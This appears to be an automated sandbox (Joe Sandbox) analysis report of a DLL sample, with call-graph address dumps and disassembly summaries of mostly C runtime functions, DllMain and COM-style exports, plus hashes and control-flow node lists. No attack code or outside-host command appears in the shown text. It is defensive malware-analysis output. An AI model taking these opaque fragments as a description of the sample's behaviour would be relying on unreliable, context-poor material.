_abort 26751->26918 26753 73cf72bb 26919 73cf90a7 26 API calls _abort 26753->26919 26756 73cf72e7 26902 73cf7223 26756->26902 26758 73cf72f2 26920 73cf730f LeaveCriticalSection __vfwprintf_l 26758->26920 26760->26741 26764 73cf7319 26761->26764 26763 73cf10f2 26763->26733 26763->26745 26767 73cf7325 ___scrt_is_nonwritable_in_current_image 26764->26767 26765 73cf7333 26789 73cf9379 20 API calls _abort 26765->26789 26767->26765 26769 73cf7360 26767->26769 26768 73cf7338 26790 73cf90a7 26 API calls _abort 26768->26790 26771 73cf7365 26769->26771 26772 73cf7372 26769->26772 26791 73cf9379 20 API calls _abort 26771->26791 26781 73cfb091 26772->26781 26775 73cf737b 26776 73cf738f 26775->26776 26777 73cf7382 26775->26777 26793 73cf73c3 LeaveCriticalSection __vfwprintf_l 26776->26793 26792 73cf9379 20 API calls _abort 26777->26792 26778 73cf7343 ___scrt_is_nonwritable_in_current_image 26778->26763 26782 73cfb09d ___scrt_is_nonwritable_in_current_image 26781->26782 26794 73cfb937 EnterCriticalSection 26782->26794 26784 73cfb0ab 26795 73cfb12b 26784->26795 26788 73cfb0dc ___scrt_is_nonwritable_in_current_image 26788->26775 26789->26768 26790->26778 26791->26778 26792->26778 26793->26778 26794->26784 26803 73cfb14e 26795->26803 26796 73cfb0b8 26809 73cfb0e7 26796->26809 26797 73cfb1a7 26814 73cf8474 20 API calls 2 library calls 26797->26814 26799 73cfb1b0 26815 73cf834f 20 API calls __dosmaperr 26799->26815 26802 73cfb1b9 26802->26796 26816 73cfbc56 11 API calls 2 library calls 26802->26816 26803->26796 26803->26797 26803->26803 26812 73cfab2d EnterCriticalSection 26803->26812 26813 73cfab41 LeaveCriticalSection 26803->26813 26806 73cfb1d8 26817 73cfab2d EnterCriticalSection 26806->26817 26808 73cfb1eb 26808->26796 26818 73cfb97f LeaveCriticalSection 26809->26818 26811 73cfb0ee 26811->26788 26812->26803 26813->26803 26814->26799 26815->26802 26816->26806 26817->26808 26818->26811 26820 73cf1878 ___scrt_initialize_default_local_stdio_options 26819->26820 26823 73cf7111 26820->26823 26824 73cf7156 26823->26824 26825 73cf7141 26823->26825 26824->26825 26827 73cf715a 26824->26827 26835 73cf9379 20 API calls _abort 26825->26835 26832 73cf48f1 26827->26832 26829 73cf7146 26836 73cf90a7 26 API calls _abort 26829->26836 26830 73cf1884 26830->26733 26837 73cf4878 26832->26837 26834 73cf4915 26834->26830 26835->26829 26836->26830 26838 73cf4884 ___scrt_is_nonwritable_in_current_image 26837->26838 26845 73cfab2d EnterCriticalSection 26838->26845 26840 73cf4892 26846 73cf5059 26840->26846 26844 73cf48b0 ___scrt_is_nonwritable_in_current_image 26844->26834 26845->26840 26862 73cfab93 27 API calls 3 library calls 26846->26862 26848 73cf507c 26863 73cf4edb 38 API calls 2 library calls 26848->26863 26850 73cf5093 26864 73cf4e71 20 API calls 2 library calls 26850->26864 26852 73cf50c8 26865 73cf52e9 26852->26865 26856 73cf50e0 26879 73cfac48 62 API calls __vfwprintf_l 26856->26879 26858 73cf5102 26880 73cf24a6 5 API calls ___raise_securityfailure 26858->26880 26860 73cf489f 26861 73cf48bd LeaveCriticalSection __vfwprintf_l 26860->26861 26861->26844 26862->26848 26863->26850 26864->26852 26881 73cf6c2c 26 API calls 3 library calls 26865->26881 26867 73cf530e 26890 73cf9379 20 API calls _abort 26867->26890 26869 73cf5313 26891 73cf90a7 26 API calls _abort 26869->26891 26870 73cf50d3 26878 73cf4f5e 20 API calls ___std_type_info_destroy_list 26870->26878 26872 73cf52f9 _fread 26872->26867 26872->26870 26882 73cf56bb 26872->26882 26892 73cf63a3 42 API calls _fread 26872->26892 26893 73cf5849 42 API calls _fread 26872->26893 26894 73cf589a 50 API calls 4 library calls 26872->26894 26895 73cf5ce8 50 API calls 2 library calls 26872->26895 26878->26856 26879->26858 26880->26860 26881->26872 26896 73cf5718 26882->26896 26884 73cf56c0 26885 73cf56d7 26884->26885 26899 73cf9379 20 API calls _abort 26884->26899 26885->26872 26887 73cf56c9 26900 73cf90a7 26 API calls _abort 26887->26900 26889 73cf56d4 26889->26872 26890->26869 26891->26870 26892->26872 26893->26872 26894->26872 26895->26872 26897 73cf5787 __vfwprintf_l 26 API calls 26896->26897 26898 73cf5724 __vfwprintf_l 26897->26898 26898->26884 26899->26887 26900->26889 26901->26756 26903 73cf7245 26902->26903 26904 73cf7230 26902->26904 26908 73cf7240 26903->26908 26921 73cfb22c 26903->26921 26927 73cf9379 20 API calls _abort 26904->26927 26907 73cf7235 26928 73cf90a7 26 API calls _abort 26907->26928 26908->26758 26912 73cf7261 26913 73cfa9e3 __vfwprintf_l 26 API calls 26912->26913 26914 73cf7267 26913->26914 26930 73cfaf76 31 API calls 2 library calls 26914->26930 26916 73cf726d 26916->26908 26931 73cf834f 20 API calls __dosmaperr 26916->26931 26918->26753 26919->26760 26920->26760 26922 73cfb244 26921->26922 26926 73cf7259 26921->26926 26923 73cfa9e3 __vfwprintf_l 26 API calls 26922->26923 26922->26926 26924 73cfb264 26923->26924 26925 73d006ce __wsopen_s 62 API calls 26924->26925 26925->26926 26929 73cfb1ee 20 API calls ___std_type_info_destroy_list 26926->26929 26927->26907 26928->26908 26929->26912 26930->26916 26931->26908 26932 73cf1000 26933 73cf10e0 29 API calls 26932->26933 26934 73cf100b 26933->26934 26935 73cf1022 26934->26935 26936 73cf1930 _fwprintf 76 API calls 26934->26936 26937 73cf7299 67 API calls 26935->26937 26938 73cf1034 _memcmp 26935->26938 26936->26935 26937->26938 26989 73cf16b0 26990 73cf10e0 29 API calls 26989->26990 26991 73cf16bb 26990->26991 26992 73cf16d2 26991->26992 26993 73cf1930 _fwprintf 76 API calls 26991->26993 26994 73cf16e4 26992->26994 26997 73cf7299 67 API calls 26992->26997 26993->26992 26995 73cf16ff GlobalAlloc 26994->26995 26996 73cf16f6 26994->26996 26995->26996 26998 73cf171e 26995->26998 26997->26994 27002 73cf1270 26998->27002 27003 73cf10e0 29 API calls 27002->27003 27004 73cf1279 27003->27004 27005 73cf1930 _fwprintf 76 API calls 27004->27005 27006 73cf1290 27004->27006 27005->27006 27007 73cf12a2 27006->27007 27008 73cf7299 67 API calls 27006->27008 27020 73cf12d0 27007->27020 27008->27007 27011 73cf1330 27012 73cf10e0 29 API calls 27011->27012 27013 73cf133b 27012->27013 27014 73cf1930 _fwprintf 76 API calls 27013->27014 27015 73cf1352 27013->27015 27014->27015 27016 73cf7299 67 API calls 27015->27016 27019 73cf1364 27015->27019 27016->27019 27017 73cf1397 27017->26996 27018 73cf1382 GlobalFree 27018->27017 27019->27017 27019->27018 27021 73cf10e0 29 API calls 27020->27021 27023 73cf12db 27021->27023 27022 73cf12f2 27025 73cf12bb 27022->27025 27026 73cf7299 67 API calls 27022->27026 27023->27022 27024 73cf1930 _fwprintf 76 API calls 27023->27024 27024->27022 27025->27011 27026->27025

                                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                                        Function 73D011B6 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 304 73d011b6-73d011e6 call 73d00f19 307 73d01201-73d0120d call 73cffe02 304->307 308 73d011e8-73d011f3 call 73cf9366 304->308 314 73d01226-73d0126f call 73d00e84 307->314 315 73d0120f-73d01224 call 73cf9366 call 73cf9379 307->315 313 73d011f5-73d011fc call 73cf9379 308->313 322 73d014d8-73d014de 313->322 324 73d01271-73d0127a 314->324 325 73d012dc-73d012e5 GetFileType 314->325 315->313 329 73d012b1-73d012d7 GetLastError call 73cf9343 324->329 330 73d0127c-73d01280 324->330 326 73d012e7-73d01318 GetLastError call 73cf9343 CloseHandle 325->326 327 73d0132e-73d01331 325->327 326->313 343 73d0131e-73d01329 call 73cf9379 326->343 334 73d01333-73d01338 327->334 335 73d0133a-73d01340 327->335 329->313 330->329 331 73d01282-73d012af call 73d00e84 330->331 331->325 331->329 337 73d01344-73d01392 call 73cffd4b 334->337 336 73d01342 335->336 335->337 336->337 346 73d013a2-73d013c6 call 73d00c37 337->346 347 73d01394-73d01396 call 73d01095 337->347 343->313 354 73d013c8 346->354 355 73d013d9-73d0141c 346->355 351 73d0139b-73d013a0 347->351 351->346 353 73d013ca-73d013d4 call 73cfaff5 351->353 353->322 354->353 357 73d0143d-73d0144b 355->357 358 73d0141e-73d01422 355->358 360 73d01451-73d01455 357->360 361 73d014d6 357->361 358->357 359 73d01424-73d01438 358->359 359->357 360->361 363 73d01457-73d0148a CloseHandle call 73d00e84 360->363 361->322 366 73d0148c-73d014b8 GetLastError call 73cf9343 call 73cfff14 363->366 367 73d014be-73d014d2 363->367 366->367 367->361
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                          • Part of subcall function 73D00E84: CreateFileW.KERNELBASE(00000000,00000000,?,73D0125F,?,?,00000000,?,73D0125F,00000000,0000000C), ref: 73D00EA1
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 73D012CA
                                                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 73D012D1
                                                                                                                                                                                                                                                        • GetFileType.KERNELBASE(00000000), ref: 73D012DD
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 73D012E7
                                                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 73D012F0
                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 73D01310
                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 73D0145A
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 73D0148C
                                                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 73D01493
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000001B.00000002.2802678961.0000000073CF1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 73CF0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2802476962.0000000073CF0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803279230.0000000073D06000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803509423.0000000073D0D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803584975.0000000073D0F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_73cf0000_attzwu.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                                                                                        • String ID: H
                                                                                                                                                                                                                                                        • API String ID: 4237864984-2852464175
                                                                                                                                                                                                                                                        • Opcode ID: 9b561b454ac9ee659403f3d15dbfc4d1ff922237326c6e2072d55ba441b38f62
                                                                                                                                                                                                                                                        • Instruction ID: b15e996449506bb48cb0e8d312b4199cecced669269aff0c6631ec7c2455ca39
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9b561b454ac9ee659403f3d15dbfc4d1ff922237326c6e2072d55ba441b38f62
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1CA13437A042498FDF099F78C8517AE7BB5EB06734F18015DE816EB2D0EB358916CB61
                                                                                                                                                                                                                                                        Function 73D02A17 Relevance: 9.3, APIs: 6, Instructions: 300COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 372 73d02a17-73d02a27 373 73d02a41-73d02a43 372->373 374 73d02a29-73d02a3c call 73cf9366 call 73cf9379 372->374 376 73d02a49-73d02a4f 373->376 377 73d02dab-73d02db8 call 73cf9366 call 73cf9379 373->377 390 73d02dc3 374->390 376->377 380 73d02a55-73d02a80 376->380 395 73d02dbe call 73cf90a7 377->395 380->377 383 73d02a86-73d02a8f 380->383 386 73d02a91-73d02aa4 call 73cf9366 call 73cf9379 383->386 387 73d02aa9-73d02aab 383->387 386->395 388 73d02ab1-73d02ab5 387->388 389 73d02da7-73d02da9 387->389 388->389 393 73d02abb-73d02abf 388->393 394 73d02dc6-73d02dcb 389->394 390->394 393->386 397 73d02ac1-73d02ad8 393->397 395->390 400 73d02af5-73d02afe 397->400 401 73d02ada-73d02add 397->401 405 73d02b00-73d02b17 call 73cf9366 call 73cf9379 call 73cf90a7 400->405 406 73d02b1c-73d02b26 400->406 403 73d02ae7-73d02af0 401->403 404 73d02adf-73d02ae5 401->404 409 73d02b91-73d02bab 403->409 404->403 404->405 438 73d02cde 405->438 407 73d02b28-73d02b2a 406->407 408 73d02b2d-73d02b4b call 73cf8389 call 73cf834f * 2 406->408 407->408 442 73d02b68-73d02b8e call 73d0217b 408->442 443 73d02b4d-73d02b63 call 73cf9379 call 73cf9366 408->443 411 73d02bb1-73d02bc1 409->411 412 73d02c7f-73d02c88 call 73cff7e7 409->412 411->412 415 73d02bc7-73d02bc9 411->415 425 73d02c8a-73d02c9c 412->425 426 73d02cfb 412->426 415->412 419 73d02bcf-73d02bf5 415->419 419->412 423 73d02bfb-73d02c0e 419->423 423->412 428 73d02c10-73d02c12 423->428 425->426 431 73d02c9e-73d02cad GetConsoleMode 425->431 430 73d02cff-73d02d17 ReadFile 426->430 428->412 433 73d02c14-73d02c3f 428->433 435 73d02d73-73d02d7e GetLastError 430->435 436 73d02d19-73d02d1f 430->436 431->426 437 73d02caf-73d02cb3 431->437 433->412 441 73d02c41-73d02c54 433->441 444 73d02d80-73d02d92 call 73cf9379 call 73cf9366 435->444 445 73d02d97-73d02d9a 435->445 436->435 446 73d02d21 436->446 437->430 439 73d02cb5-73d02ccf ReadConsoleW 437->439 440 73d02ce1-73d02ceb call 73cf834f 438->440 447 73d02cf0-73d02cf9 439->447 448 73d02cd1 GetLastError 439->448 440->394 441->412 452 73d02c56-73d02c58 441->452 442->409 443->438 444->438 449 73d02da0-73d02da2 445->449 450 73d02cd7-73d02cdd call 73cf9343 445->450 456 73d02d24-73d02d36 446->456 447->456 448->450 449->440 450->438 452->412 459 73d02c5a-73d02c7a 452->459 456->440 463 73d02d38-73d02d3c 456->463 459->412 464 73d02d55-73d02d60 463->464 465 73d02d3e-73d02d4e call 73d02846 463->465 471 73d02d62 call 73d02996 464->471 472 73d02d6c-73d02d71 call 73d02686 464->472 477 73d02d51-73d02d53 465->477 478 73d02d67-73d02d6a 471->478 472->478 477->440 478->477
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000001B.00000002.2802678961.0000000073CF1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 73CF0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2802476962.0000000073CF0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803279230.0000000073D06000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803509423.0000000073D0D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803584975.0000000073D0F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_73cf0000_attzwu.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: ce4fcc1337ec74e75fd882c12014a8d274664b7b949c151de0c0b75ef16f1ede
                                                                                                                                                                                                                                                        • Instruction ID: 0e3cfc8290f3a4f10bbe00b06496b752277298d2632fd7c84863fe62dc30e359
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ce4fcc1337ec74e75fd882c12014a8d274664b7b949c151de0c0b75ef16f1ede
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C6C1F472D0534E9FDB02CFA9C880B9DBBB4BF09B20F184089E956B7291E7319941CB75
                                                                                                                                                                                                                                                        Function 73CF17A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 50threadCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 480 73cf17a0-73cf17b0 481 73cf17b4-73cf17c0 call 73cf10e0 480->481 482 73cf17b2-73cf181b call 73cf10e0 480->482 488 73cf17d3-73cf17d7 481->488 489 73cf17c2-73cf17cb call 73cf1930 481->489 490 73cf182e-73cf1832 482->490 491 73cf181d-73cf1826 call 73cf1930 482->491 493 73cf17d9-73cf17dd call 73cf7299 488->493 494 73cf17e5-73cf180d DisableThreadLibraryCalls 488->494 498 73cf17d0 489->498 496 73cf1834-73cf1838 call 73cf7299 490->496 497 73cf1840-73cf1848 490->497 500 73cf182b 491->500 502 73cf17e2 493->502 494->497 503 73cf183d 496->503 498->488 500->490 502->494 503->497
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • _fwprintf.LIBCONCRTD ref: 73CF17CB
                                                                                                                                                                                                                                                        • DisableThreadLibraryCalls.KERNEL32(?), ref: 73CF1807
                                                                                                                                                                                                                                                        • _fwprintf.LIBCONCRTD ref: 73CF1826
                                                                                                                                                                                                                                                          • Part of subcall function 73CF1930: __vfwprintf_l.LIBCONCRTD ref: 73CF194A
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000001B.00000002.2802678961.0000000073CF1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 73CF0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2802476962.0000000073CF0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803279230.0000000073D06000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803509423.0000000073D0D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803584975.0000000073D0F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_73cf0000_attzwu.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _fwprintf$CallsDisableLibraryThread__vfwprintf_l
                                                                                                                                                                                                                                                        • String ID: DllMain Attach$DllMain Detach
                                                                                                                                                                                                                                                        • API String ID: 2097229008-2504013106
                                                                                                                                                                                                                                                        • Opcode ID: 6e0c3a10b5a7318edae3f88e2a041b5cd08b51fb5b873866aff405083294b770
                                                                                                                                                                                                                                                        • Instruction ID: fb23243c5130a737a03ccd2a55be6e22be0f616b1b32bf6c1a8d8d6211b8148c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6e0c3a10b5a7318edae3f88e2a041b5cd08b51fb5b873866aff405083294b770
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6811C2B7D00209EBDB40DFE6C554BDE77B4AB18304F24816AE406AB244D73AD644CF86
                                                                                                                                                                                                                                                        Function 73CF16B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58memoryCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 504 73cf16b0-73cf16c2 call 73cf10e0 507 73cf16d5-73cf16d9 504->507 508 73cf16c4-73cf16cd call 73cf1930 504->508 510 73cf16db-73cf16df call 73cf7299 507->510 511 73cf16e7-73cf16f4 507->511 514 73cf16d2 508->514 519 73cf16e4 510->519 512 73cf16ff-73cf1713 GlobalAlloc 511->512 513 73cf16f6-73cf16fd 511->513 517 73cf171e-73cf175a call 73cf1270 call 73cf1330 512->517 518 73cf1715-73cf171c 512->518 516 73cf176d-73cf1773 513->516 514->507 521 73cf1760-73cf1764 517->521 518->516 519->511 521->516 522 73cf1766 521->522 522->516
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • _fwprintf.LIBCONCRTD ref: 73CF16CD
                                                                                                                                                                                                                                                          • Part of subcall function 73CF1930: __vfwprintf_l.LIBCONCRTD ref: 73CF194A
                                                                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000000,000003F0), ref: 73CF1706
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000001B.00000002.2802678961.0000000073CF1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 73CF0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2802476962.0000000073CF0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803279230.0000000073D06000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803509423.0000000073D0D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803584975.0000000073D0F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_73cf0000_attzwu.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AllocGlobal__vfwprintf_l_fwprintf
                                                                                                                                                                                                                                                        • String ID: classCreateInstance
                                                                                                                                                                                                                                                        • API String ID: 1489353356-4089175763
                                                                                                                                                                                                                                                        • Opcode ID: 69d41093ef94dbbe72198527d79d10811878822c5a72ee51a7e7f7dcc2ff72d7
                                                                                                                                                                                                                                                        • Instruction ID: d0b84107940e0033c8aa232e4788f9a513973dcaa8ab0ac0d57f3fa31a4183f7
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 69d41093ef94dbbe72198527d79d10811878822c5a72ee51a7e7f7dcc2ff72d7
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BB21AFB6E0020AEFDB41DFE5C544B9DB7B5FB48305F2480A9E806AB381C7799A84CF55
                                                                                                                                                                                                                                                        Function 73CF1000 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 525 73cf1000-73cf1012 call 73cf10e0 528 73cf1025-73cf1029 525->528 529 73cf1014-73cf101d call 73cf1930 525->529 531 73cf102b-73cf102f call 73cf7299 528->531 532 73cf1037-73cf104c call 73cf25e0 528->532 533 73cf1022 529->533 536 73cf1034 531->536 538 73cf104e-73cf1063 call 73cf1630 532->538 539 73cf1065-73cf106e 532->539 533->528 536->532 541 73cf1075-73cf107b 538->541 539->541
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • _fwprintf.LIBCONCRTD ref: 73CF101D
                                                                                                                                                                                                                                                          • Part of subcall function 73CF1930: __vfwprintf_l.LIBCONCRTD ref: 73CF194A
                                                                                                                                                                                                                                                        • _memcmp.LIBVCRUNTIME ref: 73CF1042
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000001B.00000002.2802678961.0000000073CF1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 73CF0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2802476962.0000000073CF0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803279230.0000000073D06000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803509423.0000000073D0D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803584975.0000000073D0F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_73cf0000_attzwu.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: __vfwprintf_l_fwprintf_memcmp
                                                                                                                                                                                                                                                        • String ID: DllGetClassObject
                                                                                                                                                                                                                                                        • API String ID: 2571412134-2359037521
                                                                                                                                                                                                                                                        • Opcode ID: a5df21eb6607b6caf83a5f4b9ef61234eb328c82d9d611a6582d644a249c5417
                                                                                                                                                                                                                                                        • Instruction ID: 185d7af0bf2cdc429697f4f4faff513c210181e7bfa09504ee8771ff3d7d796f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a5df21eb6607b6caf83a5f4b9ef61234eb328c82d9d611a6582d644a249c5417
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5701ADB6A0034AFBDB40DFA5CC41B9E7778AB44340F144158A801AB281E772AA58CBA2
                                                                                                                                                                                                                                                        Function 73CF1330 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 543 73cf1330-73cf1342 call 73cf10e0 546 73cf1355-73cf1359 543->546 547 73cf1344-73cf134d call 73cf1930 543->547 549 73cf135b-73cf135f call 73cf7299 546->549 550 73cf1367-73cf1380 546->550 551 73cf1352 547->551 556 73cf1364 549->556 553 73cf1397-73cf139a 550->553 554 73cf1382-73cf1395 GlobalFree 550->554 551->546 555 73cf139d-73cf13a0 553->555 554->555 556->550
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • _fwprintf.LIBCONCRTD ref: 73CF134D
                                                                                                                                                                                                                                                          • Part of subcall function 73CF1930: __vfwprintf_l.LIBCONCRTD ref: 73CF194A
                                                                                                                                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 73CF1386
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000001B.00000002.2802678961.0000000073CF1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 73CF0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2802476962.0000000073CF0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803279230.0000000073D06000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803509423.0000000073D0D000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 0000001B.00000002.2803584975.0000000073D0F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_73cf0000_attzwu.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FreeGlobal__vfwprintf_l_fwprintf
                                                                                                                                                                                                                                                        • String ID: Release
                                                                                                                                                                                                                                                        • API String ID: 1395331696-2822328095
                                                                                                                                                                                                                                                        • Opcode ID: 85ec448bb75abcae72e4fbe0be80b90bdf7df540b6c24b2b3fe41756564f066c
                                                                                                                                                                                                                                                        • Instruction ID: 2e752ad5282034a87be10406337ed2cb51c227287aafb8ba02129244399dcf24
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 85ec448bb75abcae72e4fbe0be80b90bdf7df540b6c24b2b3fe41756564f066c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7D01627790020AEFCB00DFA4C544B9DBBB4FB44345F148555E84A9B380D732EA44DB91
                                                                                                                                                                                                                                                        Function 73D007B9 Relevance: 4.7, APIs: 3, Instructions: 186COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
